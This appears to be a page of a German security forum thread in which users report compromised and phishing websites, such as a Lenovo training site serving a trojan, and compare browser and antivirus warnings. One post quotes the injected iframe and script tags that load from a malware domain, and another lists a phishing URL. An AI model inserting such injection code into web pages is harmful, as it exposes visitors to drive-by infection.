Rokop Security

Willkommen, Gast ( Anmelden | Registrierung )

87 Seiten V  « < 65 66 67 68 69 > »   
Reply to this topicStart new topic
> Infizierte Webseiten
Robo88
Beitrag 15.10.2010, 12:06
Beitrag #1321



Fühlt sich hier wohl
****

Gruppe: Mitglieder
Beiträge: 427
Mitglied seit: 03.04.2010
Mitglieds-Nr.: 8.016



Danke für diese Info.
Eine gute Massnahme.

Gruss Heiko
Go to the top of the page
 
+Quote Post
Rios
Beitrag 16.10.2010, 08:31
Beitrag #1322


Threadersteller

Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 4.246
Mitglied seit: 12.06.2004
Mitglieds-Nr.: 984

Betriebssystem:
Windows 10



Irgend etwas hat sich da abgespielt, oder macht es noch immer auf dieser Seite?? deshalb die FF Warnung. ph34r.gif

Angehängte Datei  Snap_2010.10.16_09h18m10s_002.png ( 27.25KB ) Anzahl der Downloads: 20


OK: Habe dies gefunden. Die Seite wurde gehackt.
http://blogs.paretologic.com/malwarediarie...nal-ihr-problem

Der Beitrag wurde von Rios bearbeitet: 16.10.2010, 09:01
Go to the top of the page
 
+Quote Post
Robo88
Beitrag 16.10.2010, 13:20
Beitrag #1323



Fühlt sich hier wohl
****

Gruppe: Mitglieder
Beiträge: 427
Mitglied seit: 03.04.2010
Mitglieds-Nr.: 8.016



ZITAT(scu @ 14.10.2010, 21:17) *
Ich hab den VirusTotal-Thread leider nicht gefunden, daher poste ich hier hier. Passt aber auch hier gut rein.

G Data technology integrated into VirusTotal's URL scanner
http://blog.gdatasoftware.com/overview/art...tegrated-i.html



Hier ein Screenshot:

Go to the top of the page
 
+Quote Post
Rios
Beitrag 19.10.2010, 18:35
Beitrag #1324


Threadersteller

Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 4.246
Mitglied seit: 12.06.2004
Mitglieds-Nr.: 984

Betriebssystem:
Windows 10



Zitat Heise.
Lenovos Webseite für Trainings rund um Service und Support versucht Besucher mit dem Trojaner Hackload.AD zu infizieren. Mehr…http://www.heise.de/security/meldung/Lenovo-erneut-mit-Trojaner-Problemen-1110398.html

Angehängte Datei  Snap_2010.10.19_19h28m43s_001.png ( 22.68KB ) Anzahl der Downloads: 23
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 19.10.2010, 18:38
Beitrag #1325



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 11.168
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 10 pro x64
Virenscanner:
Emsisoft Anti-Malware
Firewall:
Sandboxie | cFos



ZITAT(Rios @ 19.10.2010, 19:34) *
Angehängte Datei  Snap_2010.10.19_19h28m43s_001.png ( 22.68KB ) Anzahl der Downloads: 23


[attachment=6641:lenovo.jpg]


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
Rios
Beitrag 19.10.2010, 18:50
Beitrag #1326


Threadersteller

Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 4.246
Mitglied seit: 12.06.2004
Mitglieds-Nr.: 984

Betriebssystem:
Windows 10



Die bösen Jungs, machen aber auch vor nichts halt!! ph34r.gif
http://www.net-security.org/malware_news.php?id=1499
Go to the top of the page
 
+Quote Post
Gast_uweli1967_*
Beitrag 19.10.2010, 18:53
Beitrag #1327






Gäste






thumbup.gif
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 19.10.2010, 19:13
Beitrag #1328



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 11.168
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 10 pro x64
Virenscanner:
Emsisoft Anti-Malware
Firewall:
Sandboxie | cFos



ZITAT(Rios @ 19.10.2010, 19:49) *
Die bösen Jungs, machen aber auch vor nichts halt!! ph34r.gif


Ja, es wird immer doller. Bin mal gespannt, wo das noch hinführen wird.

ZITAT(uweli1967 @ 19.10.2010, 19:52) *


Tja, sind irgendwie alle schnell bei der Sache. Nur Lenovo nicht sad.gif


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
Gast_uweli1967_*
Beitrag 19.10.2010, 19:29
Beitrag #1329






Gäste






@Solution-Design
Ich hatt extra das Warnfenster von Firefox ignoriert und auf weiter geklickt um zu sehen ob Avast Free reagiert(tat er ja auch mit dem Webschutzmodul). Danach hatte ich zu "Testzwecken" bei Avast Free den Webschutz und Netzwerkschutz deaktiviert und die Seite abermals aufgerufen und wieder die Meldung von Firefox ignoriert, dieses Mal muckste sich Avast(logischerweise)nicht. Also ist es schon sinnvoll, wenn ein Virenschutzprogramm Schutzmodule wie Web und Netzwerkschutz hat, oder nicht? Ein Virenschutzprogramm ohne Webschutz hätt einen User nicht davor bewahrt die infizierte Webseite aufzurufen falls dessen Browser nicht angeschlagen hätte oder dessen Warnung ignoriert worden wäre.
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 19.10.2010, 20:09
Beitrag #1330



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 11.168
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 10 pro x64
Virenscanner:
Emsisoft Anti-Malware
Firewall:
Sandboxie | cFos



Wenn die Signatur des Web-Schutzes die Malware nicht erkennt, dann ist er sowieso vergebens. Da hilft dann nur ein sicherer Browser, eine gute Heuristik oder Behaviorblocker bzw. HIPS. Wobei die letzten beiden wohl ausreichend sein sollten. Habe die Seite im IE geladen, da werden nur zwei WEB-Sites erwähnt. Sehe da jetzt keine wirkliche Gefahr.


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
Paul12
Beitrag 19.10.2010, 20:19
Beitrag #1331



Fühlt sich hier wohl
****

Gruppe: Mitglieder
Beiträge: 451
Mitglied seit: 02.09.2008
Mitglieds-Nr.: 7.061
Virenscanner:
KIS 2012
Firewall:
KIS+Router



Iron sperrt die Seite,IE9 und Fox sieht keine Probleme.EAM 5.0 sagt auch nichts.
Go to the top of the page
 
+Quote Post
Gast_uweli1967_*
Beitrag 19.10.2010, 20:19
Beitrag #1332






Gäste






So unterschiedlich ist der Schutz durch Browser whistling.gif Firefox erkennt die Gefahr, aber ChromePlus nicht, da kommt keine Warnung, hier schlägt "nur" der Webschutz von Avast Free bei mir an:
Go to the top of the page
 
+Quote Post
Gast_uweli1967_*
Beitrag 19.10.2010, 20:21
Beitrag #1333






Gäste






ZITAT
Fox sieht keine Probleme
Wie bitte? bei mir warnt Firefox vor der Webseite, lese mal weiter oben.
Go to the top of the page
 
+Quote Post
Paul12
Beitrag 19.10.2010, 20:24
Beitrag #1334



Fühlt sich hier wohl
****

Gruppe: Mitglieder
Beiträge: 451
Mitglied seit: 02.09.2008
Mitglieds-Nr.: 7.061
Virenscanner:
KIS 2012
Firewall:
KIS+Router



ZITAT(uweli1967 @ 19.10.2010, 20:20) *
Wie bitte? bei mir warnt Firefox vor der Webseite, lese mal weiter oben.


Bei mir sagt Fox 3.6.10 nichts,nur Iron - ist ja im Prinzip Chrome.
EAM 5 meckert sonst auch immer gleich.

Problem ist vielleicht schon behoben.

Der Beitrag wurde von Paul12 bearbeitet: 19.10.2010, 20:26
Go to the top of the page
 
+Quote Post
Gast_uweli1967_*
Beitrag 19.10.2010, 20:33
Beitrag #1335






Gäste






Das ist schon komisch Paul 12, ich habe gerade extra den Cache von FF gelöscht und die Seite erneut aufgerufen und Firefox reagiert bei mir:
Go to the top of the page
 
+Quote Post
Robo88
Beitrag 19.10.2010, 22:41
Beitrag #1336



Fühlt sich hier wohl
****

Gruppe: Mitglieder
Beiträge: 427
Mitglied seit: 03.04.2010
Mitglieds-Nr.: 8.016



Hier die Wepawet Analyse zum Lenovo Problem:

http://wepawet.cs.ucsb.edu/domain.php?hash...c7f&type=js

http://wepawet.cs.ucsb.edu/view.php?hash=1...917&type=js

Das ist die Problem URL:

QUELLTEXT
http://chemphilic.com/images/ochem.php


QUELLTEXT
<iframe src="http://chemphilic.com/images/ochem.php?s=tOxY81RP9&id=2"></iframe>


QUELLTEXT
<script src=http://chemphilic.com/images/ochem.php></script>


Habe die Seite bei Virustotal hochgeladen:

http://www.virustotal.com/file-scan/report...92e6-1287524807

URL Analysis tool Result:

Firefox Malware site

G-Data Malware site

Google Safebrowsing Malware site

Opera Clean site

ParetoLogic Clean site

Phishtank Clean site

Normalized URL: hxxp://chemphilic.com/images/ochem.php

URL MD5: dfff88262bb3f034b34eaa82afc3bd7f

Das Problem scheint schon seit gestern zu bestehen.




Gruss Heiko

Der Beitrag wurde von Robo88 bearbeitet: 19.10.2010, 22:59
Go to the top of the page
 
+Quote Post
Voyager
Beitrag 12.01.2011, 22:53
Beitrag #1337



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



Ein nice DHL Phishing , bisher unbekannt...

http://www.ps-check092.de/dhl/verifizierung/index.html


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
scu
Beitrag 12.01.2011, 23:16
Beitrag #1338



Wohnt schon fast hier
*****

Gruppe: Mitglieder
Beiträge: 1.191
Mitglied seit: 07.08.2007
Mitglieds-Nr.: 6.352
Virenscanner:
G DATA



ZITAT(Voyager @ 12.01.2011, 22:52) *
Ein nice DHL Phishing , bisher unbekannt...

http://www.ps-check092.de/dhl/verifizierung/index.html

Ist wohl schon wieder offline.
Go to the top of the page
 
+Quote Post
Damnatus
Beitrag 13.01.2011, 10:44
Beitrag #1339



Fühlt sich hier wohl
****

Gruppe: Mitglieder
Beiträge: 567
Mitglied seit: 13.11.2010
Mitglieds-Nr.: 8.251

Betriebssystem:
Win 10 Pro x64 | Mac OS X
Virenscanner:
G Data
Firewall:
G Data



GData meldete eben auf der Site von Hitman Pro Hersteller SurfRight B.V. einen Virus:
http://files.surfright.nl/caretaker/surfright_cas1_en.bmp

FP oder real?


--------------------
"Freiheit ist der Abstand zwischen Jäger und Gejagtem"
-Rainer von Vielen - Der Abstand-

Be a part of the Universe - Star Citizen. Enlist now!
Go to the top of the page
 
+Quote Post
Xeon
Beitrag 13.01.2011, 11:31
Beitrag #1340



Fühlt sich hier wohl
****

Gruppe: Mitglieder
Beiträge: 323
Mitglied seit: 15.02.2010
Mitglieds-Nr.: 7.945



Was genau meldet den G Data (Bericht) ?
Go to the top of the page
 
+Quote Post

87 Seiten V  « < 65 66 67 68 69 > » 
Reply to this topicStart new topic
1 Besucher lesen dieses Thema (Gäste: 1 | Anonyme Besucher: 0)
0 Mitglieder:

 



Vereinfachte Darstellung Aktuelles Datum: 31.05.2025, 11:15
Impressum